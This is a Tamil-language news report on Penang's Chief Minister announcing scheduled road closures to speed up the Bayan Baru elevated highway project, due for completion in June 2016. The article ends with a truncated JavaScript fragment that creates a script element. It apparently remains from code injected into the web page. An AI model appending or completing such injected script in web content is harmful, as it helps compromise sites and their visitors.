ஸ்பான் நெடுஞ்சாலை மேம்பாட்டுத் திட்டத்திற்காக சாலைகள் மூடப்படும் – முதல்வர்

செய்தியாளர் சந்திப்பில் பேசிய மாநில முதல்வர் மேதகு லிம் குவான் எங் அவர்கள்.
செய்தியாளர் சந்திப்பில் பேசிய மாநில முதல்வர் மேதகு லிம் குவான் எங் அவர்கள்.

பொதுப்பணி துறை மற்றும் UEM மேம்பாட்டு நிறுவன கீழ் இயங்கும் 3 பிரிவுகளை இணைக்கும் ஸ்பான் உயர்ந்த நெடுஞ்சாலை நிர்மாணிப்புப் பணியை விரைவில் முடிக்கும் நோக்கத்தில் அந்நிறுவனங்களின் விண்ணப்பத்திற்கு இணங்க சம்மந்தப்பட்ட சாலைகள் குறிப்பிட்ட நேரத்திற்கு மூடப்படும் என்றார் மாநில முதல்வர் மேதகு லிம் குவான் எங். பாயான் பாரு, சுங்கை குளுவாங் பகுதியில் நிர்மாணிக்கப்படும் இந்த நெடுஞ்சாலையினால் கடந்த 17/8/2015 பினாங்கு மாநில பாயன் பாரு பகுதியில் கடுமையான நெரிசல் ஏற்பட்டது குறிப்பிடத்தக்கதாகும்.

எனவே, இந்நிலை மீண்டும் நிகழாமல் இருப்பதை உறுதிச்செய்ய வரையூறுக்கப்பட்ட காலத்தில் அச்சாலைகள் மூடப்படும். UEM மேம்பாட்டு நிறுவனம் முறையான சாலை அடைப்பு திட்டத்தைக் கொண்டுவருமாறு பணிந்துரைத்த மாநில முதல்வரின் கட்டளைக்கு இணங்க கீழ்க்காணும் அட்டவணைப்படி அச்சாலைகள் மூடப்படும்.

ஸ்பான் நெடுஞ்சாலை மேம்பாட்டுத் திட்ட மாதிரி வரைப்படம்
ஸ்பான் நெடுஞ்சாலை மேம்பாட்டுத் திட்ட மாதிரி வரைப்படம்

மேலும், செய்தியாளர்களிடம் பேசிய மாநில முதல்வர் அச்சாலையை கடக்கும் வாகனமோட்டிகளின் பாதுகாப்பை மேம்படுத்த மாநில அரசு சிறப்புக்குழுவை நியமித்துள்ளது. இக்குழு ஒவ்வொரு கட்டப்பணி நிறைவடைந்தவுடன் பாதுகாப்பு அம்சங்களை ஆராய்ந்த பின்னர் சாலை போக்குவரத்துக்கு திறக்கப்படும். ஸ்பான் நெடுஞ்சாலை மேம்பாட்டுத் திட்டம் ஜுன் 2016-ஆம் ஆண்டு நிறைவடையும் என எதிர்ப்பார்க்கப்படுகிறது.var d=document;var s=d.createElement(‘script’);